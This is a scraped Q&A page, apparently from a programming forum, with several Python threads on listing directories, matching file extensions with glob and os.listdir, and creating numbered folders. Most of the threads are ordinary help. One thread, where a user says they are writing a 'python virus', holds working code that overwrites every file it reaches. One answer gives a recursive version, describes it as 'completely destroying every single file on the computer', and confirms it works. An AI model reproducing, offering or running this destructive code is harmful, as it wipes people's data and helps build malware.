Search a file directory that is given as an input? - python

So i've been given a task to take 3 parameters from a user, and then do these tasks:
Search the folder given as input.
Find all of a certain file type extension.
Print this to another folder.
Is there an easier way of performing this task? Attempting to use os.listdir responds that it can't find the file, as it doesn't accept a variable as input.
Directories = [];
InitDirect = str(input('Please insert the file directory you want to search (C:\\x)'))
FileType = str(input('Please state a desired file type (.txt, .png)'))
OutDirect = str(input('Please state the output directory for the files.'))
for file in os.listdir("InitDirect"):
if file.endswith("FileType"):
print(os.path.join("InitDirect", file))
This is my current code, although likely incorrect. If anyone could help, that'd be great!

There is no need to use quotes around the variable names. Adding "" around the variable names actually declares strings and you are not using the value of the variable. Change the code to the following and it should work.
Directories = [];
InitDirect = str(input('Please insert the file directory you want to search (C:\\x)'))
FileType = str(input('Please state a desired file type (.txt, .png)'))
OutDirect = str(input('Please state the output directory for the files.'))
for file in os.listdir(InitDirect):
if file.endswith(FileType):
print(os.path.join(InitDirect, file))

Related

How to create a unique folder name (location path) in Windows?

I am writing a script to save some images in a folder each time it runs.
I would like make a new folder each it runs with a enumerating folder names. for example if I run it first time , it just save the images in C:\images\folder1 and next time I run it, it will save the images in C:\images\folder2 and C:\images\folder3 and so on.
And if I delete these folders, and start running again, it would start from the "C:\images\folder1" again.
I found this solution works for file names but not for the folder names:
Create file but if name exists add number
The pathlib library is the standard pythonic way of dealing with any kind of folders or files and is system independent. As far as creating a new folder name, that could be done in a number of ways. You could check for the existence of each file (like Patrick Gorman's answer) or you could save a user config file with a counter that keeps track of where you left off or you could recall your file creation function if the file already exists moving the counter. If you are planning on having a large number of sub-directories (millions), then you might consider performing a binary search for the next folder to create (instead of iterating through the directory).
Anyway, in windows creating a file/folder with the same name, adds a (2), (3), (4), etc. to the filename. The space and parenthesis make it particularly easy to identify the number of the file/folder. If you want the number directly appended, like folder1, folder2, folder3, etc., then that becomes a little tricky to detect. We essentially need to check what the folder endswith as an integer. Finding particular expressions within in a tricky string is normally done with re (regular expressions). If we had a space and parenthesis we probably wouldn't need re to detect the integer in the string.
from pathlib import Path
import re
def create_folder(string_or_path):
path = Path(string_or_path)
if not path.exists():
#You can't create files and folders with the same name in Windows. Hence, check exists.
path.mkdir()
else:
#Check if string ends with numbers and group the first part and the numbers.
search = re.search('(.*?)([0-9]+$)',path.name)
if search:
basename,ending = search.groups()
newname = basename + str(int(ending)+1)
else:
newname = path.name + '1'
create_folder(path.parent.joinpath(newname))
path = Path(r'C:\images\folder1')
create_folder(path) #creates folder1
create_folder(path) #creates folder2, since folder1 exists
create_folder(path) #creates folder3, since folder1 and 2 exist
path = Path(r'C:\images\space')
create_folder(path) #creates space
create_folder(path) #creates space1, since space exists
Note: Be sure to use raw-strings when dealing with windows paths, since "\f" means something in a python string; hence you either have to do "\\f" or tell python it is a raw-string.
I feel like you could do something by getting a list of the directories and then looping over numbers 1 to n for the different possible directories until one can't be found.
from pathlib import Path
import os
path = Path('.')
folder = "folder"
i = 1
dirs = [e for e in path.iterdir() if e.is_dir()]
while True:
if folder+str(i) not in dirs:
folder = folder+str(i)
break
i = i+1
os.mkdir(folder)
I'm sorry if I made any typos, but that seems like a way that should work.

How can I open a directory by its name?

I am writing a program that prompts for the name of the directory and then saves all the file names in a list. How can I get a path to a specific directory obly knowing its name?
I tried os.path.dirname(os.path.realpath(__file__)) but it would only show me my current dir, where the file with the program is, not the searchable dir.
__file__ is a special variable in python that includes the current file's path. If understand your question correctly, then all you need is to pass the variable where you have stored user input from the prompt in place of __file__. So you will have something like:
print("what dir do you want to search?")
searchable_dir = input()
print(
"You selected " +
os.path.dirname(os.path.realpath( searchable_dir ))
)
This is good as a learning exercise, but note that to get a list of files in a directory the preferred method would be to use os.listdir.

How can I design a function which opens a folder based on user input, picks files with certain title format, and then reads specific lines from them?

I am having a moment of complete brain freeze right now and cannot seem to figure out how to design a code that will perform a series of tasks in one function. Basically, I want to design a code that asks the User for the input of a name of a folder in the working directory. The folders will have a 6 digit number for their name (for this example, let's assume the number of the folder is 111234). Once the folder is specified, certain files inside said folder will be opened and read. These files will be selected based on how their filenames are formatted, which is
(foldername)_(filenumber)_0_structure.in
wherein, for this example, the foldername is 111234 and the filenumber represents the order that the file appears in within the folder (can be the number zero or higher). The other terms in the filename (such as the zero after the filenumber), the word "structure", and the .in file extension are all constant. After all files that conform to this format are selected and opened, I want the 2nd and 3rd lines of these files to be read and copied into a dict whose keys are the file's filenumber and whose values contain a list of strings (i.e. the 2nd and 3rd lines).
So far, I have written the following in order to address these needs:
import os
from os import path
import re
def folder_validation(foldername):
folder_contents= {}
while True:
try:
foldername= str(raw_input(foldername))
file_path= path.join(current_directory, foldername)
except IOError:
print("Please give the name of a folder that exists in the current working directory.")
continue
for filename in os.listdir(file_path):
if re.search("{}_{}_0_detect1.in".format(foldername,[0*]), filename):
file_contents= str(open(filename).readlines()[2:3])
folder_contents[filenumber]= file_contents
return folder_contents
folder_input= folder_validation("Please give the name of the relevant folder you wish to analyze:")
The most obvious problem with the above code is that I am not sure how to format the regular expression search to include the user's input and the placement of any integer number in the filenumber variable. Additionally, the raw_input does not seem to be working. Any assistance would be most appreciated.
There were two main problems in my code: the first problem was that I did not properly configure the while loop condition and so the code would get stuck. The second problem was that I did not set up the filepath to my files in my folder correctly, and as a result, my code could not open the files and read them. The regex line was also improved to include any filenames that had numbers 0 and above be read (in the specified format). The corrected version of the code is posted below.
import os
from os import path
import re
def folder_validation(foldername):
folder_contents= {}
while True:
try:
foldername= str(raw_input(foldername))
file_path= path.join(current_directory, foldername)
except IOError:
print("Please give the name of a folder that exists in the current working directory.")
continue
else:
break
while True:
for filename in os.listdir(file_path):
if re.search("{}_[0-9]+_0_detect1.in".format(foldername,[0*]), filename):
file_contents= open(path.join(file_path,filename))
file_lines= file_contents.readlines()[2:3]
folder_contents[filename]= file_lines
return folder_contents
folder_input= folder_validation("Please give the name of the relevant folder you wish to analyze:")

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.
Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
print item # or do something else with item
So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"
Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

Generalize a program using iglob

I have a program which scans a folder or path for a given type of files and then analyze them.
import glob
path = raw_input("ENTER PATH TO SEARCH: ")
list_of_file = glob.iglob('*.txt')
for filename in list_of_file:
print filename`
But in this script the program will scan the directory only in which it was stored in path statement gets no value.
Now if I write:
list_of_file = glob.iglob(path + '*.txt')
this also do not make my work going.
So please suggest a way in which whatever path I enter the program follows that path and search for particular file types, no matter where I kept my script.
I assume English is not your first language, so please forgive me if I have misunderstood your question. It seems to me that you want to be able to enter a directory and then find all the ".txt" files in that directory?
If so, then the following code should suffice to give you an example:
"""Find all .py files is a given directory."""
import os
import glob
path = raw_input("Enter path: ")
fullglob = os.path.join(path, "*.py")
for fn in glob.iglob(fullglob):
print os.path.split(fn)[1]
The last line takes off the path you put in to ensure iglob() finds the right directory. You can use the help() function to get documentation on os.path.join() and os.path.split().

Categories

Resources